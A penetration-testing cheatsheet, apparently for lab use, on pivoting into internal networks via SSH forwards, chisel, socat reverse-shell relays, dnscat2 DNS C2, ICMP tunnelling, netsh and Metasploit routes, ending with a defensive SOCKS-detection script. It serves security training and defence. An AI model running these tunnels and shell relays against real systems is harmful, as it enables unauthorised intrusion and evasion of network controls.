πŸ›‘οΈ Methodology Checklist

  • Identify pivot host: dual-homed, compromised, or trusted bridging host
  • Choose method: SSH -D (Linux SSH access) / Chisel (Windows pivot) / MSF autoroute (existing session)
  • Configure Proxychains for chosen SOCKS port
  • Validate tunnel: test connectivity to internal target before full attack
  • Run tools through Proxychains (proxychains4 -q)
  • Clean up all tunnel processes and proxy configs on exit

🎯 Operational Context

Use when: Identifying the right pivoting tool for current access and target network — quick decision matrix for SSH/Chisel/MSF/netsh/socat selection. Think Dumber First: SSH access on Linux pivot → ssh -D 9050 (30-second setup). Windows pivot no tools → netsh portproxy. Have Meterpreter → autoroute. Match the tool to what’s already available — don’t transfer Chisel if SSH works. Skip when: N/A — reference document.


⚡ Tactical Cheatsheet

| Command | Tactical Outcome |
|---|---|
| `ifconfig` | Linux — show all NICs and IPs (find dual-homed hosts) |
| `netstat -r` | Linux — show routing table |
| `ipconfig /all` | Windows — show all adapters |
| `route print` | Windows — show routing table |
| `for i in {1..254}; do (ping -c 1 [SUBNET].$i \| grep "bytes from" &); done` | Linux bash ping sweep |
| `for /L %i in (1 1 254) do ping [SUBNET].%i -n 1 -w 100 \| find "Reply"` | Windows CMD ping sweep |
| `1..254 \| % {"[SUBNET].$($_): $(Test-Connection -count 1 -comp [SUBNET].$($_) -quiet)"}` | PowerShell ping sweep |
| `ssh -L [LPORT]:localhost:[REMOTE_PORT] [USER]@[PIVOT_IP]` | SSH local forward — single service |
| `ssh -D 9050 [USER]@[PIVOT_IP]` | SSH dynamic forward — SOCKS proxy for entire subnet |
| `ssh -R [PIVOT_LAN_IP]:[PIVOT_PORT]:0.0.0.0:[LPORT] [USER]@[PIVOT_IP] -vN` | SSH remote forward — catch reverse shell through pivot |
| `sudo sshuttle -r [USER]@[PIVOT_IP] [SUBNET]/[CIDR] -v` | Transparent SSH proxy — no proxychains needed |
| `echo y \| plink.exe -ssh -D 9050 [USER]@[PIVOT_IP]` | Windows plink — SOCKS proxy |
| `plink.exe -ssh -L [LPORT]:[INTERNAL_IP]:[PORT] [USER]@[PIVOT_IP] -pw [PASS]` | Windows plink — local port forward |
| `sudo sed -i 's/socks4.*/socks5 127.0.0.1 1080/' /etc/proxychains4.conf` | Update proxychains config in-place |
| `proxychains nmap -v -Pn -sT [TARGET_IP]` | Nmap through SOCKS (must use -sT -Pn) |
| `proxychains xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /dynamic-resolution +clipboard /cert:ignore` | RDP through SOCKS proxy |
| `socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[LHOST]:[LPORT]` | Socat reverse shell relay |
| `socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[INTERNAL_IP]:[TARGET_PORT]` | Socat bind shell relay |
| `netsh.exe interface portproxy add v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP] connectport=[TARGET_PORT] connectaddress=[INTERNAL_IP]` | Windows netsh port forward |
| `netsh advfirewall firewall add rule name="Pivot" dir=in action=allow protocol=TCP localport=[LPORT]` | Open Windows firewall for netsh rule |
| `netsh interface portproxy delete v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP]` | Remove netsh rule (cleanup) |
| `python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0` | Rpivot server on attack host |
| `python2.7 client.py --server-ip [LHOST] --server-port 9999` | Rpivot client on pivot host |
| `./chisel server -v -p [PORT] --socks5` | Chisel bind server on pivot |
| `./chisel client -v [PIVOT_IP]:[PORT] socks` | Chisel client connect to bind server |
| `sudo ./chisel server --reverse -v -p [PORT] --socks5` | Chisel reverse server on attack host |
| `./chisel client -v [LHOST]:[PORT] R:socks` | Chisel reverse client on pivot |
| `sudo ruby dnscat2.rb --dns host=[LHOST],port=53,domain=[DOMAIN] --no-cache` | Dnscat2 C2 server |
| `Start-Dnscat2 -DNSserver [LHOST] -Domain [DOMAIN] -PreSharedSecret [SECRET] -Exec cmd` | Dnscat2 PowerShell client |
| `sudo ./ptunnel-ng -p[PIVOT_IP] -l 2222 -r[PIVOT_IP] -R 22 -v` | ptunnel-ng client — SSH over ICMP |
| `ssh -D 9050 -p 2222 ubuntu@127.0.0.1` | SOCKS proxy through ICMP tunnel |
| `regsvr32.exe SocksOverRDP-Plugin.dll` | Register SocksOverRDP plugin on Windows jump host |
| `run post/multi/manage/autoroute SESSION=[N] SUBNET=[SUBNET]` | MSF AutoRoute — internal subnet via Meterpreter |
| `use auxiliary/server/socks_proxy` → `set SRVPORT 9050` → `set version 4a` → `run` | MSF SOCKS proxy via AutoRoute |
| `meterpreter > portfwd add -l [LPORT] -p [TARGET_PORT] -r [INTERNAL_IP]` | Meterpreter local port forward |
| `meterpreter > portfwd add -R -l [LPORT] -p [PIVOT_PORT] -L [LHOST]` | Meterpreter reverse port forward |
| `xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:tools,[LOCAL_PATH] /cert:ignore` | RDP with local drive share for tool transfer |

🔬 Deep Dive & Workflow

Tool Selection Decision Tree

```
Do you have SSH access to the pivot?
├── Yes → SSH (-D for subnet, -L for single service, -R for reverse shell)
│         OR sshuttle (if you want no proxychains overhead)
└── No → Do you have a Meterpreter session?
         ├── Yes → AutoRoute + SOCKS module, or portfwd for specific ports
         └── No → Can you drop a binary on pivot?
                  ├── Yes (Linux) → Chisel (SOCKS5, bind or reverse)
                  │                 OR Rpivot (if pivot can only call out)
                  │                 OR Socat (for relay without SOCKS)
                  ├── Yes (Windows) → Chisel or SocksOverRDP or plink (if PuTTY present)
                  │                   OR netsh for simple port forward (no binary needed)
                  └── Protocol tunneling needed?
                       ├── Only DNS egress → Dnscat2
                       └── Only ICMP allowed → ptunnel-ng
```

Proxychains Rules

  • Always -sT (TCP connect scan) and -Pn (skip ping) with Nmap through SOCKS
  • SYN scans (-sS) and UDP scans fail through SOCKS4/4a; SOCKS5 handles UDP but tool support varies
  • ICMP (ping) does not traverse SOCKS tunnels
  • SOCKS5 (socks5 in proxychains.conf) preferred over SOCKS4 when available

Common Port Conflicts

| Scenario | Problem | Fix |
|---|---|---|
| plink RDP forward on Windows | Port 3389 in use by local RDP | Use local port 3390 instead |
| SSH -D vs existing SOCKS | Port 9050 in use by Tor | Use alternate port (8080, 1080, etc.) |
| netsh portproxy bind fails | Not running as Administrator | Open elevated CMD |

Cleanup Checklist

```
# Remove netsh rule
netsh interface portproxy delete v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP]

# Remove MSF routes
run post/multi/manage/autoroute ACTION=remove SUBNET=[SUBNET]

# Flush portfwd rules
meterpreter > portfwd flush

# Kill socat/chisel processes on pivot
kill [PID]
```

πŸ› οΈ Troubleshooting & Edge Cases

| Problem | Cause | Fix |
|---|---|---|
| No pivoting tool works | All blocked | Check available alternatives: python3 socks proxy, socat, /dev/tcp; tool-free options exist |
| Proxychains not working with tool | Config file wrong | Verify: /etc/proxychains.conf has `socks5 127.0.0.1 [PORT]`; use socks5 not socks4 |
| Tunnel established but target unreachable | Route not added | Add route for internal subnet; MSF: `route add [SUBNET] [MASK] [SESSION_ID]` |
| Multiple tunnels creating loops | Misconfigured chaining | Document tunnel chain clearly; each hop needs its own port; test connectivity at each step |
| VPN drops killing tunnel | HTB lab instability | Use `-o ServerAliveInterval=30 -o ServerAliveCountMax=3` in SSH for keepalive (each option needs its own `-o`); re-establish quickly after drop |

πŸ“ Reporting Trigger

Finding Title: Pivot Through Compromised Host Enables Internal Network Access

Impact: Establishing a SOCKS proxy through a compromised dual-homed host provides full access to the internal network segment from the attacker’s external position, enabling attacks against previously unreachable systems.

Root Cause: Compromised host has access to multiple network segments without adequate segmentation controls. No monitoring of unusual outbound connections from the pivot host.

Recommendation: Implement network micro-segmentation to limit lateral connectivity. Monitor for unusual outbound connections (SOCKS proxy patterns, tunnel protocols) from internal hosts. Deploy host-based firewall rules restricting inter-segment connectivity.
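Added example, not part of the original cheatsheet: a classifier for the first bytes of a TCP stream that recognises SOCKS4, SOCKS4a and SOCKS5 client openers. It shows concretely why a SOCKS tunnel only carries TCP connections (the reason behind `-sT -Pn` in the Proxychains Rules above) and gives a defender a starting primitive for the "SOCKS proxy patterns" monitoring the Recommendation calls for. The sample payloads, addresses and hostname are constructed.

```python
import ipaddress
import struct
from dataclasses import dataclass
from typing import Optional

# Both SOCKS4 and SOCKS5 ask the proxy to open a TCP connection on the
# client's behalf. No raw sockets are involved, which is why SYN scans and
# ICMP never traverse the tunnel and only TCP connect() scans work.


@dataclass
class SocksHint:
    """What a SOCKS client opener reveals before any payload flows."""
    version: str                      # "socks4", "socks4a" or "socks5"
    dest_host: Optional[str] = None   # only in SOCKS4/4a CONNECT (v5 sends it later)
    dest_port: Optional[int] = None
    userid: Optional[str] = None      # SOCKS4 USERID field (often empty)
    methods: tuple = ()               # SOCKS5 auth methods offered by the client


def classify_socks(data: bytes) -> Optional[SocksHint]:
    """Return a SocksHint if `data` starts like a SOCKS client opener, else None."""
    if len(data) < 2:
        return None
    ver, second = data[0], data[1]
    if ver == 0x05:
        # SOCKS5 greeting: VER=5, NMETHODS, METHODS[NMETHODS]
        if second == 0 or len(data) < 2 + second:
            return None
        return SocksHint("socks5", methods=tuple(data[2:2 + second]))
    if ver == 0x04 and second == 0x01 and len(data) >= 9:
        # SOCKS4 CONNECT: VER=4, CMD=1, DSTPORT(2), DSTIP(4), USERID, NUL
        port, raw_ip = struct.unpack("!H4s", data[2:8])
        nul = data.find(b"\x00", 8)
        if nul == -1:
            return None
        userid = data[8:nul].decode("latin-1")
        # SOCKS4a: DSTIP of 0.0.0.x (x != 0) means "resolve this hostname remotely"
        if raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0:
            end = data.find(b"\x00", nul + 1)
            if end == -1:
                return None
            host = data[nul + 1:end].decode("latin-1")
            return SocksHint("socks4a", host, port, userid)
        return SocksHint("socks4", str(ipaddress.IPv4Address(raw_ip)), port, userid)
    return None


# Constructed sample openers (what a proxychains "socks5" / "socks4" entry emits)
SAMPLE_SOCKS5 = b"\x05\x02\x00\x02"                       # offers no-auth and user/pass
SAMPLE_SOCKS4 = b"\x04\x01\x0d\x3d\xc0\xa8\x01\x0a\x00"   # CONNECT 192.168.1.10:3389
SAMPLE_SOCKS4A = b"\x04\x01\x00\x16\x00\x00\x00\x01\x00internal.example\x00"
```

Fed the first bytes of each new outbound flow from a pivot-capable host, a hit on an unexpected destination port (or any SOCKS opener at all from a workstation) is a cheap, high-signal alert.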